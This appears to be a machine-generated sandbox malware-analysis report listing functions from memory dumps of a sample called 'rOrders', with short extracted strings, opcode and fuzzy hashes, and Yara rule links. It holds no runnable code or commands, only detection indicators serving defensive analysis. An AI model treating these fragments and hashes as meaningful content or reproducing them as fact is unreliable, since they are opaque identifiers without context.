String ID: LRsq$LRsq
API String ID: 0-2113534932
Opcode ID: 873ac1dc0ce2781e4431a1f6033221585e11c61564d362afde635bb54b1a32f0
Instruction ID: 6ccc6e4ce9ba44e05b02c2baf37a8aeb0519cb783bc1ab0b61d348bd85f2080d
Opcode Fuzzy Hash: 873ac1dc0ce2781e4431a1f6033221585e11c61564d362afde635bb54b1a32f0
Instruction Fuzzy Hash: F381C075B101158FCB48EF7CC95496E7BB6AF88620B2585ADE405CB3B5DB30DD01CBA2

Function 02B55C08 Relevance: 2.7, Strings: 2, Instructions: 229COMMON

Download Yara Rule

Strings

,wq, xrefs: 02B55CDE
,wq, xrefs: 02B55CE8

Memory Dump Source

Source File: 00000004.00000002.4535776413.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b50000_rOrders.jbxd

Similarity

API ID:
String ID: ,wq$,wq
API String ID: 0-1895925779
Opcode ID: da117d0a1540f6fceaf333c5565203f503bf9574a8b2465e22fd9672f47e7c57
Instruction ID: 6440d61ecb13931372f01c420efb46fc5e5e1c14bbd0282332bb2eeb2ab8a11f
Opcode Fuzzy Hash: da117d0a1540f6fceaf333c5565203f503bf9574a8b2465e22fd9672f47e7c57
Instruction Fuzzy Hash: ED81A275A00125CFCB24CF69C488BA9B7B2FF89316B9581A9D805DF365DB31E841CF50

Function 069C9510 Relevance: 2.7, Strings: 2, Instructions: 212COMMON

Download Yara Rule

Strings

(&sq, xrefs: 069C962B
(wq, xrefs: 069C96EA

Memory Dump Source

Source File: 00000004.00000002.4556505338.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_69c0000_rOrders.jbxd

Similarity

API ID:
String ID: (&sq$(wq
API String ID: 0-153982265
Opcode ID: 179d3bf6bf0d34fbc34378ef145899072a979608c6b8f973001a0cf1b12036ee
Instruction ID: 0e619b2eac38fb31b887770e002c6ad7ba1a653e0782db00787c61e5dffd1653
Opcode Fuzzy Hash: 179d3bf6bf0d34fbc34378ef145899072a979608c6b8f973001a0cf1b12036ee
Instruction Fuzzy Hash: CC719331F006195BDF59DFA9D8906AEBBB6AFD8710F148429E405AB380DF309D02C7E2

Function 02B53428 Relevance: 2.6, Strings: 2, Instructions: 112COMMON

Download Yara Rule

Strings

Xwq, xrefs: 02B53435
Xwq, xrefs: 02B5345E

Memory Dump Source

Source File: 00000004.00000002.4535776413.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b50000_rOrders.jbxd

Similarity

API ID:
String ID: Xwq$Xwq
API String ID: 0-2617233878
Opcode ID: bdea9efab01c38ac7c19bbdf0fa9dca62a1b0dd34e6944df5dd4d41e0905ce86
Instruction ID: cf17f3a289d7a5a349b4d5b31087b93f7e6d2ccaea87d7ab708ce23b8d044bb7
Opcode Fuzzy Hash: bdea9efab01c38ac7c19bbdf0fa9dca62a1b0dd34e6944df5dd4d41e0905ce86
Instruction Fuzzy Hash: E731D071B042348BDF299AAA599437EA6EAEBC4290F1C44F9DC16CB380DFB4CC418691

Function 02B50C8F Relevance: 1.7, Strings: 1, Instructions: 404COMMON

Download Yara Rule

Strings

LRsq, xrefs: 02B50E5E

Memory Dump Source

Source File: 00000004.00000002.4535776413.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b50000_rOrders.jbxd

Similarity

API ID:
String ID: LRsq
API String ID: 0-3165563352
Opcode ID: 5eac119fb89ee56b9cebfc5df380e21a7033d27f2491d2e05822e3440afd9b59
Instruction ID: 67997b97158da2ea395336bf0182bace5989d2efd1d8f43147fab6eb28a8f3c5
Opcode Fuzzy Hash: 5eac119fb89ee56b9cebfc5df380e21a7033d27f2491d2e05822e3440afd9b59
Instruction Fuzzy Hash: 7822CC79E11219CFCB54EF64E994A9DBBB2FF88301F1089A9D819A7358DB306D85CF40

Function 02B50CA0 Relevance: 1.6, Strings: 1, Instructions: 395COMMON

Download Yara Rule

Strings

LRsq, xrefs: 02B50E5E

Memory Dump Source

Source File: 00000004.00000002.4535776413.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b50000_rOrders.jbxd

Similarity

API ID:
String ID: LRsq
API String ID: 0-3165563352
Opcode ID: 45ae0afe12149c1fba042160fbe06408dcb9710463d290eb01b4545f597b34ae
Instruction ID: e482e7b654c4a7d6ab76ad83bc5d9b87f144054c4cf89face326e4e67427c460
Opcode Fuzzy Hash: 45ae0afe12149c1fba042160fbe06408dcb9710463d290eb01b4545f597b34ae
Instruction Fuzzy Hash: 8222BC79E11219CFCB54EF64E994A9DBBB2FF88301F1089A9D819A7358DB306D85CF40

Function 02B5A650 Relevance: 1.4, Strings: 1, Instructions: 122COMMON

Download Yara Rule

Strings

(osq, xrefs: 02B5A7D9

Memory Dump Source

Source File: 00000004.00000002.4535776413.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b50000_rOrders.jbxd

Similarity

API ID:
String ID: (osq
API String ID: 0-609861455
Opcode ID: 49176354d38c766a64b7c250638fd5edac2b4f516ee1418d4e6de56bc0a0b9d3
Instruction ID: c403512ceb7e96158e474545aba0c172812eff52f34a07a39b5afe303cd2c831
Opcode Fuzzy Hash: 49176354d38c766a64b7c250638fd5edac2b4f516ee1418d4e6de56bc0a0b9d3
Instruction Fuzzy Hash: 6541D235B042549FCB099F79D864AAEBBF6BBC8210F148569E916E7391CE309C02CB91

Function 02B5A818 Relevance: .4, Instructions: 405COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4535776413.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b50000_rOrders.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2cb948c27c58f7e36c4da3575e795a64db8d5c38a8e1576684e75e6d4957ac3
Instruction ID: 5c2e8791454f3fae592d9324f92979d97b0cfb30593d195abdbdcb0d4322398e
Opcode Fuzzy Hash: a2cb948c27c58f7e36c4da3575e795a64db8d5c38a8e1576684e75e6d4957ac3
Instruction Fuzzy Hash: F9F13075E405258FCB04DFACC994A9DBBF2FF88314B1A8199E915AB361DB31EC41CB90

Function 02B57438 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4535776413.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b50000_rOrders.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2c9488b20ea99f0b72b76a9b1a4d8430a579cd14d5e2fc1a890535b60e50be2
Instruction ID: e452e896477c4b2ee64efdd8d888e4238bca2eac0fbe3293fd374f236aa5d296
Opcode Fuzzy Hash: d2c9488b20ea99f0b72b76a9b1a4d8430a579cd14d5e2fc1a890535b60e50be2
Instruction Fuzzy Hash: 4671E6347002258FCB15DF29D898BAABBE6EF49604B1940E9E906CB3B1DF70DC41DB91

Function 069C1191 Relevance: .2, Instructions: 177COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4556505338.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_69c0000_rOrders.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3898a4130cf39cfc2bc0b5e2c91200e5b377023fa52eb6bd66f3a4e411ab5dff
Instruction ID: d3a3229ad9075fc93ee3241b5786ebc9fadd1a3b119ed33ae97a3d954971e98f
Opcode Fuzzy Hash: 3898a4130cf39cfc2bc0b5e2c91200e5b377023fa52eb6bd66f3a4e411ab5dff
Instruction Fuzzy Hash: 5081BF74E412299FDBA5DF29DC90BDDBBB2BB89310F1081EAD808A7354DB305E818F45

Function 02B5CEC7 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4535776413.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b50000_rOrders.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6550e7ebe2434f1b6e1440a3187a2c7ed9d22176fd855ff0c1781e08ad1b9e8a
Instruction ID: e01be163f08ac13ff107f7599a2244b23119750fc54a1508e4cb743a5dd6c2ff
Opcode Fuzzy Hash: 6550e7ebe2434f1b6e1440a3187a2c7ed9d22176fd855ff0c1781e08ad1b9e8a
Instruction Fuzzy Hash: D351BF389A23468FC3582F61E1AD12E7BF6FB0F72B744AC14E55E85219DB3058A5CB20

Function 02B5CED8 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4535776413.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b50000_rOrders.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ecd74331ebb5a09f92fbb4c50502a3b54105c2fdb920b4b1940364a8c7a9b06
Instruction ID: 513d139cac887286ee79b27db224048edb7dac36af8df87319e6fd6beff4cf0d
Opcode Fuzzy Hash: 3ecd74331ebb5a09f92fbb4c50502a3b54105c2fdb920b4b1940364a8c7a9b06
Instruction Fuzzy Hash: BA51A0389A23478FC3582F61A1ED12E7BF6FB4F72B744AC14E55E812199B3058A5CF20

Function 02B5E2D9 Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4535776413.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b50000_rOrders.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a87cf2e786767c28a5fdbbffa177a98b6ddeca672af5357c0e00de026f72361
Instruction ID: 7f0ea7ccf940de0422d95ee78017c4d6e3af44f3ac9ea7bcf6a733be36c09987
Opcode Fuzzy Hash: 4a87cf2e786767c28a5fdbbffa177a98b6ddeca672af5357c0e00de026f72361
Instruction Fuzzy Hash: 93511374D11218DFDB15DFE5D894AAEBBB2FF88300F208969D809AB355DB345A85CF40

Function 02B5CD10 Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4535776413.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b50000_rOrders.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 441d704b5d829e652469a8b3522aae79070478b82d0a4d81d657181670efdd14
Instruction ID: d8698d1be0dac74797fc298e8e8d8a1a775750631d552a4951f7a5fe0d27d8d0
Opcode Fuzzy Hash: 441d704b5d829e652469a8b3522aae79070478b82d0a4d81d657181670efdd14
Instruction Fuzzy Hash: CF518275E11208DFDB58DFA9D98499DBBF2FF89300F24816AE419AB364DB30A805CF50

Function 069CDCC0 Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4556505338.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_69c0000_rOrders.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: daaa5957aa51ead6d4b726d42232db8226f603419facac6588a7c261e5285421
Instruction ID: d5a26c270530d3cbbe7db37ffbfbdbe9b681babf9fc26a2c5d961cddf3b01d28
Opcode Fuzzy Hash: daaa5957aa51ead6d4b726d42232db8226f603419facac6588a7c261e5285421
Instruction Fuzzy Hash: 9A41AF7580231ACFD758AFB4D05D7FE7BB2EB4A322F104829D11167298DB780A88CF50

Function 02B53908 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4535776413.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b50000_rOrders.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96f9cbc0ee93707146455e233084c3cae747c1afa1167ad30d138b08faffd2b8
Instruction ID: 1602d55dd5875d7b275698f16d7f331f2fe4e7a8de5d382826a4d1e2b7504874
Opcode Fuzzy Hash: 96f9cbc0ee93707146455e233084c3cae747c1afa1167ad30d138b08faffd2b8
Instruction Fuzzy Hash: D151A275E11218CFCB48EFA9D59499DBBF2FF89311B209469E815AB324DB31A842CF50

Function 069C9A49 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4556505338.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_69c0000_rOrders.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bcc20fc52f7cff3ea1df37e73380d3f1aa40f1816d4cef58849d56a582a09d37
Instruction ID: 56b9a9088c7c72bb3d94d714d86932c9429c5bf039bcbd637096bb28631bca30
Opcode Fuzzy Hash: bcc20fc52f7cff3ea1df37e73380d3f1aa40f1816d4cef58849d56a582a09d37
Instruction Fuzzy Hash: 4551E379E01209DFDB04DFA5D584AEDBBF2BF88311F20842AD815AB394EB346A45CF50

Function 02B5F0E9 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4535776413.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b50000_rOrders.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a427b7ad5cf8b9c84d2ede1c94862ac91d6781fe7c5f4ad0d12323fe081a8e1
Instruction ID: b4c30c04fbf617b512c7901ce53490c1a02281e1e87b4d532b2728b1ef65ace8
Opcode Fuzzy Hash: 7a427b7ad5cf8b9c84d2ede1c94862ac91d6781fe7c5f4ad0d12323fe081a8e1
Instruction Fuzzy Hash: 27519C75E01228CFCB64DF64D984BEDBBB2BB49305F1055EAD809AB350D735AA81CF10

Function 02B59A63 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4535776413.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b50000_rOrders.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f4702b79ea2f1a7c4153c9824285f61e01600eca3e328feba5de1b4a8c8cc61
Instruction ID: 668f52324af4333d165998438336ae9d9ea103ada6ea28375bf27e77a7bb7238
Opcode Fuzzy Hash: 8f4702b79ea2f1a7c4153c9824285f61e01600eca3e328feba5de1b4a8c8cc61
Instruction Fuzzy Hash: 51417A31A04A69DFDF11CFA8C844B9DBBB2EF49314F048595F865AF2A1D334E910CBA0

Function 069C9500 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4556505338.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_69c0000_rOrders.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa0598b79752a24f8920f63739b0d2ec819527a47bd591ac6653ae760c08139e
Instruction ID: e49c95c7ac03cd1b2b759611355172aa6f26a5769af21badad5984ee43a8e35b
Opcode Fuzzy Hash: aa0598b79752a24f8920f63739b0d2ec819527a47bd591ac6653ae760c08139e
Instruction Fuzzy Hash: D8418071E006199BDF54DFA5C980ADEFBF5BF88710F248129E415B7280EB70A946CB91

Function 02B5D7CE Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4535776413.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b50000_rOrders.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbcf1f88c56eac0473bcbaba72fc1a7461aa136e110c0c8af73276e29d429940
Instruction ID: 17f7195a86d4a57c0f38fef4b9586f044fcdf198dc51d811922882e524d1689a
Opcode Fuzzy Hash: dbcf1f88c56eac0473bcbaba72fc1a7461aa136e110c0c8af73276e29d429940
Instruction Fuzzy Hash: 28411675D0522ACFCB04DFA8D4947EDBBF2FB49305F609699D81AAB244D734A842CF14

Function 069C9A58 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4556505338.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_69c0000_rOrders.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2efee4b8593637190ad21d68cd63a2972b6d28a340e120020af4ae8f335a9cd6
Instruction ID: ca5a0a9321c1d08c3711d0fe8b0c5bf5aebb863c4104e9379dc5ae9e244a77a0
Opcode Fuzzy Hash: 2efee4b8593637190ad21d68cd63a2972b6d28a340e120020af4ae8f335a9cd6
Instruction Fuzzy Hash: 5441C178E01209CFDB44DFA5D5946EDBBF2BF89310F20942AD815AB394EB345A46CF50

Function 02B56730 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4535776413.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b50000_rOrders.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d16bb630a59500fba8872ef4f74a7373c9c16eb8fb73dea6e83ca04dd867a406
Instruction ID: 1ec4c634c65d1e47ae8b503126b0fde36f7456bbdefe8ea71d24524cbacdb110
Opcode Fuzzy Hash: d16bb630a59500fba8872ef4f74a7373c9c16eb8fb73dea6e83ca04dd867a406
Instruction Fuzzy Hash: 5E41EF31A00258DFCB14CF64C804BAABBFAEB44304F4484AEEC559B241DB78ED59CFA1

Function 02B5D76E Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4535776413.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b50000_rOrders.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0bd651f55e34b6b5386cac1f97730d003ab7100fdb98b15f7b9ed521b6d2732a
Instruction ID: fc31166ebf819e016926e55a0fef0aca3ce7446bb4e1cf7a9830e9bf12568c7c
Opcode Fuzzy Hash: 0bd651f55e34b6b5386cac1f97730d003ab7100fdb98b15f7b9ed521b6d2732a
Instruction Fuzzy Hash: F541E475D05229CFCB00DFA8D4947EDBBF2FB49305F209699D819AB244D735A882CF54

Function 02B5D620 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4535776413.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b50000_rOrders.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a411f1bca02b211a360485d864ca3fb4faaabed7ebc6604fd035bed8f3acd9c
Instruction ID: f07559a4e696d79e97cef73298893f874841513d92d01bdf7e80d7d55676749d
Opcode Fuzzy Hash: 7a411f1bca02b211a360485d864ca3fb4faaabed7ebc6604fd035bed8f3acd9c
Instruction Fuzzy Hash: 02412475D012198BCB04DFAAD454BDEBBF2AB89300F10D2A9D808AB254DB34A842CF54

Function 02B54DC8 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4535776413.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b50000_rOrders.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bab907411c3ec751745a0cbb91290a9f05d82a8b53b5fac7dee05eb078efe536
Instruction ID: 3cee530cf5f266d1d454991895a17fbbdd5335d3cb36e2659ae009bb7d1a11d4
Opcode Fuzzy Hash: bab907411c3ec751745a0cbb91290a9f05d82a8b53b5fac7dee05eb078efe536
Instruction Fuzzy Hash: 1C318D7564011AAFCB099F64D854BAF7BB6FB88305F108868FD158B350CB34DDA1DBA0

Function 069CDCB1 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4556505338.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_69c0000_rOrders.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5d639105b10604344a4291531d9c9dc344a82779e9a856a86705d35bfbb9416
Instruction ID: 99b48f27d7654886cf885428f768b1cd4bfb2f21a4e13d86ed5b41ffce7d2b52
Opcode Fuzzy Hash: e5d639105b10604344a4291531d9c9dc344a82779e9a856a86705d35bfbb9416
Instruction Fuzzy Hash: 5C31A071C0231ACFDB58AFA4D45C7FE7BB1EF4A316F104829D11166294DB780688CF50

Function 02B576E0 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4535776413.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b50000_rOrders.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c717cdc74584e81b2ba77aaca2e77248405ef2d2bd5150f0d2e9df7fe05191df
Instruction ID: 0530f1a53216efcc7502f67fed6f8d084f4edfabb50634abd79aae881729c823
Opcode Fuzzy Hash: c717cdc74584e81b2ba77aaca2e77248405ef2d2bd5150f0d2e9df7fe05191df
Instruction Fuzzy Hash: 14219D387042254BEB24562AA994B7AA697EFC4A19F1444B9D906CF798EF25CC42E2C0

Function 02B5A809 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4535776413.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b50000_rOrders.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a707387a956342a8af69809344384b2629d6b9aa326709d6795b5156a4ddcbb9
Instruction ID: 18db2ed5d8d8f4e1195a19fb83064ee4675cf36ec2a7c4464f9484e4fdd00767
Opcode Fuzzy Hash: a707387a956342a8af69809344384b2629d6b9aa326709d6795b5156a4ddcbb9
Instruction Fuzzy Hash: 7131A970F001258FCB04DF69C884AAEBBF2FF88354B158259E955AB3A5C7349C12CB90

Function 02B5DF79 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4535776413.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b50000_rOrders.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bd20547c2dc4e765ce2a43f6c693ec7b5c1c21f33c6e61ef61cd3db8012baf0
Instruction ID: 82da3a1d2d6fce30bea93fe7751a0f05d47f6fd09494e8c2bb2f66b6568c12f3
Opcode Fuzzy Hash: 5bd20547c2dc4e765ce2a43f6c693ec7b5c1c21f33c6e61ef61cd3db8012baf0
Instruction Fuzzy Hash: 8921EA71D052198BDB08DFAAE8047EEBBB2AFC9300F04E175D814BB295DB708585CF61

Function 02B52060 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4535776413.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b50000_rOrders.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a8e78bfde448267867b485743ac5638f18c11a6bb4b1012e98e578eb02df697
Instruction ID: a58ec1d2dfdfbcee5d3b7f808f6ce43a0fdc18954bd015ead15d7cf3cabc0757
Opcode Fuzzy Hash: 5a8e78bfde448267867b485743ac5638f18c11a6bb4b1012e98e578eb02df697
Instruction Fuzzy Hash: DA21B271A01216AFCF18DB64C450AAE77B5EF9C260B10C899ED099B384DB31EA41CBD1

Function 069C96F0 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4556505338.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_69c0000_rOrders.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dae3a0718a87e4df61378b2741433d3843a001a72cf9a8bef989f65ce697a17a
Instruction ID: 7b6becb9b5905d61020d7a031febb426bdad4ed6e5b6cbbb33773572e945bdb9
Opcode Fuzzy Hash: dae3a0718a87e4df61378b2741433d3843a001a72cf9a8bef989f65ce697a17a
Instruction Fuzzy Hash: 761129373042541FCF8A6BAC6C545AE7EA7EBD5370B14443AE905DB381DE358D0293B6

Function 02B55A70 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4535776413.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b50000_rOrders.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f18e8ac0d375550ade6026f91e6dde8356c1a88f6d777b43f24ed11476f492fd
Instruction ID: dbe1bb4e9c2b8dc1b05178980de744ec9eedd9554dec68bf2c4329f99b05bc81
Opcode Fuzzy Hash: f18e8ac0d375550ade6026f91e6dde8356c1a88f6d777b43f24ed11476f492fd
Instruction Fuzzy Hash: 8321A1357019228BD7299F29C4A862BB7A6EB88656B5585A8ED16CF354CF30DC06C7C0

Function 011DD044 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4534871007.00000000011DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11dd000_rOrders.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bfdc6c1362ff27f7c4f2775eaee7fe1d61c353e206f9d2e4059bd6c2acde290
Instruction ID: bf57eefb10302da1c1023140d8f17350a7924cb3ac7bcfd902bcf70c8b4cf7ca
Opcode Fuzzy Hash: 6bfdc6c1362ff27f7c4f2775eaee7fe1d61c353e206f9d2e4059bd6c2acde290
Instruction Fuzzy Hash: D32107B1504204EFDF19CF68E9C0B26BB65FBC4354F24C9ADE9494B292C736D446CA62

Function 02B5215C Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4535776413.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b50000_rOrders.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5991b1f5af13797d530189710ec0e63721637ac722cc4fe411fb5a944797ac1b
Instruction ID: eda8a0f9de74877bd82dc9828d0ddbfc7267cb8bcbe72a57c63b8b69a5d6b877
Opcode Fuzzy Hash: 5991b1f5af13797d530189710ec0e63721637ac722cc4fe411fb5a944797ac1b
Instruction Fuzzy Hash: DC113372E042599FCB01DBF8DC105DEBB70FF89210B248796DA25B7290EA312946C7A1

Function 02B539ED Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4535776413.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b50000_rOrders.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a2f7a9022f8b66335b231fd75e188eb8edf50ab7ed64ab3fd4da03877dec2a9
Instruction ID: 2a6d04849201d2981ee846c0add60e1a7186a57a9b48a1bf9e6b0874e76dc924
Opcode Fuzzy Hash: 5a2f7a9022f8b66335b231fd75e188eb8edf50ab7ed64ab3fd4da03877dec2a9
Instruction Fuzzy Hash: 20316279E11208DFCB48EFA8E59489DBBF2FF49311B20546AE819AB324D731AD15CF40

Function 02B54DBB Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4535776413.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b50000_rOrders.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b0a86121c21a832fbb56ee14558f8034f5dae4ae640ff6c6a756dd9dcafb414
Instruction ID: 5f23dfea3c782860d519b88e29c3a7cc50e1d83009eb74bce5263f802f1b906b
